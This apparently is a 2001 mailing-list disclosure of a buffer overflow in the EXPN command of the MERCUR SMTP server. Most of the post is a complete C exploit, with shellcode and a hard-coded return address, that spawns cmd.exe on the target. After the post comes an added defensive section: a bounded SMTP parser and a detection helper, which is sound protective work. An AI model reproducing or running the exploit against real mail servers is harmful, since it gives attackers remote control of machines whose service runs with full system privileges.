From: Martin NA (martinDIRECT.SPB.RU)
Date: Fri Feb 23 2001 - 06:32:10 CST

    By default the SMTP server is installed to run from the LocalSystem
    account. This makes it easy to perform any action on the target system
    if an attacker could gain control over the code execution flow of the
    product.

    Particularly, MERCUR SMTP-Service (binary MCRSMTP.EXE version 3.30.3.0)
    suffers from a buffer overflow illustrated below:

    -- Telnet session start --

    220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at Thu, 15 Feb 2001 03:55:34 -0800
    EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

    Connection to host lost.

    C:\>

    -- Telnet session end --

    Submission of a string which contains the address the processor should
    jump to at positions 133, 134, 135 and 136 will gain full control over
    the machine...

    Here is an exploit that runs an instance of cmd.exe on the target host:

    /*
     MERCUR Mailserver 3.3 Remote Buffer Overflow
     Tested on Win2K AS SP1 with MERCUR SMTP-Server v3.30.03
     Martin Rakhmanoff
     martindirect.spb.ru
    */

    #include <winsock2.h>
    #include <stdio.h>
    #include <string.h>                 /* memset, memcpy */

    #pragma comment(lib, "ws2_32.lib")  /* Winsock 2 import library */

    /* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
    char shellcode[] =
     "\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\xD0\x33\xDB\x53"
     "\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\x78\x65\x0D\x0A";
    /*
    In SoftICE bpx 001b:00418b65 - here eip is restored with overwritten
    value...
    */

    int main(int argc, char * argv[]){

     int i;
     char sploit[512];
     char buffer[512];

     WSADATA wsaData;
     SOCKET sock;
     struct sockaddr_in server;
     struct hostent *hp;

     WSAStartup(0x202,&wsaData);
     hp = gethostbyname("arena");       /* host name of the author's test machine */
     memset(&server,0,sizeof(server));
     memcpy(&(server.sin_addr),hp->h_addr,hp->h_length);
     server.sin_family = hp->h_addrtype;
     server.sin_port = htons(25);
     sock = socket(AF_INET,SOCK_STREAM,0);
     connect(sock,(struct sockaddr*)&server,sizeof(server));

     sploit[0]='E';
     sploit[1]='X';
     sploit[2]='P';
     sploit[3]='N';
     sploit[4]=0x20;

     for(i=5;i<137;i++){
      sploit[i]=0x41;
     }

     // Return address
     //77E87D8B

     sploit[137]=0x8B;
     sploit[138]=0x89;
     sploit[139]=0xE8;
     sploit[140]=0x77;

     for(i=0;i<sizeof(shellcode);i++){
      sploit[i+141]=shellcode[i];
     }

     recv(sock,buffer,512,0);           /* read the 220 banner first */

     send(sock,sploit,173,0);

     closesocket(sock);
     WSACleanup();

     return 0;
    }

    Vendor was notified but no action was taken...

    Martin
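The overflow reported above is the classic shape of an SMTP command handler copying its argument into a fixed-size buffer with no length check. What follows is an added example, not code from the original post and not MERCUR's code: a bounded command-line parser that refuses over-long or non-printable arguments with a status code instead of overrunning a stack buffer, plus a small detection helper that counts the command lines in a captured port-25 session that such a parser would refuse. The 512-octet command-line limit is RFC 5321's; the 256-octet argument cap, all function names, the status enum and the sample session are this example's own assumptions.

```c
#include <ctype.h>
#include <string.h>

/* Limits used here: 512 octets per command line is RFC 5321's; the 256-octet
   argument cap is this example's own assumption (the RFC's path limit). */
#define SMTP_CMD_LINE_MAX 512
#define SMTP_ARG_MAX      256

enum smtp_status {
    SMTP_OK = 0, SMTP_ERR_NO_CRLF, SMTP_ERR_LINE_TOO_LONG,
    SMTP_ERR_BAD_VERB, SMTP_ERR_ARG_TOO_LONG, SMTP_ERR_ARG_NOT_PRINTABLE
};

struct smtp_command {
    char   verb[5];               /* four-letter verb, upper-cased, NUL-terminated */
    char   arg[SMTP_ARG_MAX + 1]; /* argument plus NUL; never written past its end */
    size_t arg_len;
};

/* Parse one raw command line (bytes as received, CRLF included) into *out.
   Every copy is bounded by its destination, so an argument longer than the
   buffer is refused with a status code instead of running past a fixed-size
   stack buffer into the saved return address. */
enum smtp_status smtp_parse_command(const unsigned char *buf, size_t len,
                                    struct smtp_command *out)
{
    size_t i = 0, k;

    memset(out, 0, sizeof *out);                /* also NUL-terminates verb and arg */
    if (len > SMTP_CMD_LINE_MAX)
        return SMTP_ERR_LINE_TOO_LONG;
    if (len < 2 || buf[len - 2] != '\r' || buf[len - 1] != '\n')
        return SMTP_ERR_NO_CRLF;
    len -= 2;                                   /* drop the CRLF */

    while (i < len && isalpha(buf[i]))
        i++;
    if (i != 4)                                 /* SMTP verbs are four letters */
        return SMTP_ERR_BAD_VERB;
    for (k = 0; k < 4; k++)
        out->verb[k] = (char)toupper(buf[k]);

    while (i < len && buf[i] == ' ')
        i++;
    out->arg_len = len - i;
    if (out->arg_len > SMTP_ARG_MAX)            /* the length check the overflow lacks */
        return SMTP_ERR_ARG_TOO_LONG;
    for (k = 0; k < out->arg_len; k++) {
        if (!isprint(buf[i + k]))               /* opcode bytes are not a list name */
            return SMTP_ERR_ARG_NOT_PRINTABLE;
        out->arg[k] = (char)buf[i + k];
    }
    return SMTP_OK;
}

/* Build "EXPN " + n 'A's + CRLF (constructed input in the shape of the
   report's request) and return the parser's verdict for that length. */
enum smtp_status smtp_status_for_arg_len(size_t n)
{
    static unsigned char line[1024];
    struct smtp_command cmd;
    if (n > sizeof line - 8) n = sizeof line - 8;
    memcpy(line, "EXPN ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 2);
    return smtp_parse_command(line, n + 7, &cmd);
}

/* Detection-side view: count the command lines of a raw port-25 capture that
   the parser refuses; these are the lines a sensor should alert on. */
size_t smtp_count_rejected_lines(const unsigned char *session, size_t len)
{
    struct smtp_command cmd;
    size_t start = 0, i, rejected = 0;
    for (i = 0; i + 1 < len; i++) {
        if (session[i] == '\r' && session[i + 1] == '\n') {
            if (smtp_parse_command(session + start, i + 2 - start, &cmd) != SMTP_OK)
                rejected++;
            start = i + 2;
            i++;
        }
    }
    return rejected;
}

/* Constructed capture: HELO, a benign EXPN, then an EXPN whose 148-byte
   argument ends in two non-printable bytes (the shape of an address
   overwrite, not the report's payload). Only that last line is rejected. */
size_t demo_constructed_session(void)
{
    static unsigned char s[512];
    const char *head = "HELO example.test\r\nEXPN staff\r\nEXPN ";
    size_t n = strlen(head);
    memcpy(s, head, n);
    memset(s + n, 'A', 148);            n += 148;
    memcpy(s + n, "\x8B\x89\r\n", 4);   n += 4;
    return smtp_count_rejected_lines(s, n);
}
```

The design point is that the destination capacity, not the attacker's input, decides how many bytes are copied: a 148-byte argument is stored intact, a 300-byte one is refused before any copy, and anything over the 512-octet line limit is dropped before the verb is even looked at. The same parser doubles as a detection rule, since a legitimate client never sends non-printable bytes or arguments of that size in an EXPN line.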